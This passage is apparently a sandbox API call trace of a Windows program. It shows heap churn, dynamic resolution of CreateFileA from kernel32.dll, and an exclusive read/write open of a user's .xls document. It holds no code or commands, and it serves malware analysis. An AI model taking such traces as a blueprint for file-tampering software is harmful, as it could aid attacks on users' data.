[0176.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0176.437] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0176.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0176.437] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0176.437] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0176.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0176.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0176.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0176.437] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0176.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0176.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0176.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0176.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1af0 [0176.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0176.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0176.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0176.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0176.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0176.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0176.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0176.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd408 [0176.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0176.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0176.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0176.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0176.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0176.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0176.438] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0176.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0176.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0176.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0176.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0176.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0176.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0176.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0176.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0176.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0176.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0176.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0176.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0176.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0176.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0176.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0176.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0176.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0176.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0176.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0176.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0176.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0176.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0176.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0176.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0176.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0176.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0176.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0176.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0176.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0176.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0176.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0176.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0176.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0176.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0176.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0176.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0176.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0176.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0176.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0176.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0176.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0176.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0176.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0176.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0176.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0176.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0176.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0176.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0176.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0176.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0176.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0176.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0176.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0176.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0176.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0176.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0176.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0176.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0176.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0176.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0176.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0176.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0176.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0176.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0176.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0176.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0176.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0176.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0176.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0176.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0176.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0176.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0176.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0176.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0176.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0176.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0176.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0176.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0176.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0176.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0176.440] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0176.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0176.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0176.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0176.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0176.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0176.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0176.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0176.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0176.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0176.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0176.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0176.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0176.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0176.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0176.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0176.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0176.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0176.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0176.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0176.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0176.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0176.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0176.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0176.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0176.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0176.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0176.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0176.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0176.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0176.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0176.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0176.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0176.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0176.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0176.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0176.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0176.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0176.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0176.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0176.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0176.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0176.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0176.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0176.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0176.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0176.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0176.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0176.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0176.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0176.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0176.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0176.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0176.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0176.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0176.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0176.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0176.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0176.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0176.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0176.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0176.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0176.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0176.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0176.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0176.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0176.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0176.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0176.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0176.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0176.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0176.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0176.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0176.443] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0176.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0176.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0176.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0176.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd6f0 [0176.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd6f0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0176.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0176.443] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0176.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0176.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0176.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0176.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0176.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0176.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0176.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd6f0 [0176.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd6f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0176.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0176.444] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0176.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0176.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0176.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0176.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0176.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0176.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0176.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0176.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0176.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0176.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0176.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0176.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0176.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0176.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.xls", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0176.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x35) returned 0x90ad98 [0176.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.xls", cchWideChar=53, lpMultiByteStr=0x90ad98, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.xls", lpUsedDefaultChar=0x0) returned 53 [0176.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0176.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0176.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0176.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0176.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0176.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0176.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0176.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0176.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0176.445] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pwvig6n-.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0176.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0176.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0176.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0176.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0176.447] 